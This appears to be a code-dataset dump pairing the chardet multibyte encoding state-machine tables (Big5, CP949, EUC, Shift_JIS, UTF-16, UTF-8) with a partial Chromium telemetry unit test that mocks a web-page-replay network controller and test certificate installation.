######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
# BIG5
BIG5_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
BIG5_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
Big5CharLenTable = (0, 1, 1, 2, 0)
Big5SMModel = {'classTable': BIG5_cls,
'classFactor': 5,
'stateTable': BIG5_st,
'charLenTable': Big5CharLenTable,
'name': 'Big5'}
# CP949
CP949_cls = (
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
CP949SMModel = {'classTable': CP949_cls,
'classFactor': 10,
'stateTable': CP949_st,
'charLenTable': CP949CharLenTable,
'name': 'CP949'}
# EUC-JP
EUCJP_cls = (
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5 # f8 - ff
)
EUCJP_st = (
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
EUCJPSMModel = {'classTable': EUCJP_cls,
'classFactor': 6,
'stateTable': EUCJP_st,
'charLenTable': EUCJPCharLenTable,
'name': 'EUC-JP'}
# EUC-KR
EUCKR_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0 # f8 - ff
)
EUCKR_st = (
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
EUCKRCharLenTable = (0, 1, 2, 0)
EUCKRSMModel = {'classTable': EUCKR_cls,
'classFactor': 4,
'stateTable': EUCKR_st,
'charLenTable': EUCKRCharLenTable,
'name': 'EUC-KR'}
# EUC-TW
EUCTW_cls = (
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
EUCTW_st = (
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
EUCTWSMModel = {'classTable': EUCTW_cls,
'classFactor': 7,
'stateTable': EUCTW_st,
'charLenTable': EUCTWCharLenTable,
'name': 'x-euc-tw'}
# GB2312
GB2312_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0 # f8 - ff
)
GB2312_st = (
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
GB2312SMModel = {'classTable': GB2312_cls,
'classFactor': 7,
'stateTable': GB2312_st,
'charLenTable': GB2312CharLenTable,
'name': 'GB2312'}
# Shift_JIS
SJIS_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,2,2,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
#contain such byte. We need to be more error forgiven.
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,0,0,0) # f8 - ff
SJIS_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
SJISSMModel = {'classTable': SJIS_cls,
'classFactor': 6,
'stateTable': SJIS_st,
'charLenTable': SJISCharLenTable,
'name': 'Shift_JIS'}
# UCS2-BE
UCS2BE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2BE_st = (
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
UCS2BESMModel = {'classTable': UCS2BE_cls,
'classFactor': 6,
'stateTable': UCS2BE_st,
'charLenTable': UCS2BECharLenTable,
'name': 'UTF-16BE'}
# UCS2-LE
UCS2LE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2LE_st = (
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
UCS2LESMModel = {'classTable': UCS2LE_cls,
'classFactor': 6,
'stateTable': UCS2LE_st,
'charLenTable': UCS2LECharLenTable,
'name': 'UTF-16LE'}
# UTF-8
UTF8_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0 # f8 - ff
)
UTF8_st = (
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)
UTF8SMModel = {'classTable': UTF8_cls,
'classFactor': 16,
'stateTable': UTF8_st,
'charLenTable': UTF8CharLenTable,
'name': 'UTF-8'}
|
mit
|
SummerLW/Perf-Insight-Report
|
telemetry/telemetry/internal/platform/network_controller_backend_unittest.py
|
1
|
14322
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import mock
import unittest
from telemetry.internal import forwarders
from telemetry.internal.platform import network_controller_backend
from telemetry.util import wpr_modes
DEFAULT_PORTS = forwarders.PortSet(http=1111, https=2222, dns=3333)
FORWARDER_HOST_IP = '123.321.123.321'
EXPECTED_WPR_CA_CERT_PATH = os.path.join('[tempdir]', 'testca.pem')
class FakePlatformBackend(object):
def __init__(self):
self.forwarder_factory = FakeForwarderFactory()
self.supports_test_ca = True
self.is_test_ca_installed = False
self.faulty_cert_installer = False
self.wpr_port_pairs = None
# Normally test using all default ports.
self.SetWprPortPairs(http=(0, 0), https=(0, 0), dns=(0, 0))
def SetWprPortPairs(self, http, https, dns):
self.wpr_port_pairs = forwarders.PortPairs(
forwarders.PortPair(*http),
forwarders.PortPair(*https),
forwarders.PortPair(*dns) if dns is not None else None)
def GetWprPortPairs(self, has_netsim):
del has_netsim # Unused.
return self.wpr_port_pairs
def InstallTestCa(self, ca_cert_path):
del ca_cert_path # Unused argument.
self.is_test_ca_installed = True
# Exception is raised after setting the "installed" value to confirm that
# cleaup code is being called in case of errors.
if self.faulty_cert_installer:
raise Exception('Cert install failed!')
def RemoveTestCa(self):
self.is_test_ca_installed = False
class FakeForwarderFactory(object):
def __init__(self):
self.host_ip = FORWARDER_HOST_IP
def Create(self, port_pairs):
return forwarders.Forwarder(port_pairs)
class FakeReplayServer(object):
DEFAULT_PORTS = NotImplemented # Will be assigned during test setUp.
def __init__(self, archive_path, host_ip, http_port, https_port, dns_port,
replay_args):
self.archive_path = archive_path
self.host_ip = host_ip
self.ports = forwarders.PortSet(
http_port or self.DEFAULT_PORTS.http,
https_port or self.DEFAULT_PORTS.https,
dns_port or self.DEFAULT_PORTS.dns if dns_port is not None else None)
self.replay_args = replay_args
self.is_running = False
def StartServer(self):
assert not self.is_running
self.is_running = True
return self.ports
def StopServer(self):
assert self.is_running
self.is_running = False
class TestNetworkControllerBackend(
network_controller_backend.NetworkControllerBackend):
"""Expose some private properties for testing purposes."""
@property
def wpr_ca_cert_path(self):
return self._wpr_ca_cert_path
@property
def replay_server(self):
return self._wpr_server
@property
def forwarder(self):
return self._forwarder
@property
def platform_backend(self):
return self._platform_backend
class NetworkControllerBackendTest(unittest.TestCase):
def Patch(self, *args, **kwargs):
"""Patch an object for the duration of a test, and return its mock."""
patcher = mock.patch(*args, **kwargs)
mock_object = patcher.start()
self.addCleanup(patcher.stop)
return mock_object
def PatchImportedModule(self, name):
"""Shorthand to patch a module imported by network_controller_backend."""
return self.Patch(
'telemetry.internal.platform.network_controller_backend.%s' % name)
def setUp(self):
# Always use our FakeReplayServer.
FakeReplayServer.DEFAULT_PORTS = DEFAULT_PORTS # Use global defaults.
self.Patch(
'telemetry.internal.util.webpagereplay.ReplayServer', FakeReplayServer)
# Pretend that only some predefined set of files exist.
def fake_path_exists(filename):
return filename in ['some-archive.wpr', 'another-archive.wpr']
self.Patch('os.path.exists', side_effect=fake_path_exists)
# Mock some imported modules.
mock_certutils = self.PatchImportedModule('certutils')
mock_certutils.openssl_import_error = None
mock_certutils.generate_dummy_ca_cert.return_value = ('-', '-')
mock_platformsettings = self.PatchImportedModule('platformsettings')
mock_platformsettings.HasSniSupport.return_value = True
mock_tempfile = self.PatchImportedModule('tempfile')
mock_tempfile.mkdtemp.return_value = '[tempdir]'
self.PatchImportedModule('shutil')
self.network_controller_backend = TestNetworkControllerBackend(
FakePlatformBackend())
def testOpenCloseController(self):
b = self.network_controller_backend
self.assertFalse(b.is_open)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg']) # Also installs test CA.
self.assertTrue(b.is_open)
self.assertTrue(b.is_test_ca_installed)
self.assertTrue(b.platform_backend.is_test_ca_installed)
b.Close() # Also removes test CA.
self.assertFalse(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
b.Close() # It's fine to close a closed controller.
self.assertFalse(b.is_open)
def testOpeningOpenControllerRaises(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
with self.assertRaises(AssertionError):
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
def testInstallTestCaFailure(self):
b = self.network_controller_backend
b.platform_backend.faulty_cert_installer = True
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg']) # Try to install test CA.
# Test CA is not installed, but the controller is otherwise open and safe
# to use.
self.assertTrue(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
b.Close() # No test CA to remove.
self.assertFalse(b.is_open)
self.assertFalse(b.is_test_ca_installed)
self.assertFalse(b.platform_backend.is_test_ca_installed)
def testStartStopReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
self.assertFalse(b.is_replay_active)
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
self.assertIsNotNone(b.forwarder.port_pairs)
old_replay_server = b.replay_server
old_forwarder = b.forwarder
b.StopReplay()
self.assertFalse(b.is_replay_active)
self.assertFalse(old_replay_server.is_running)
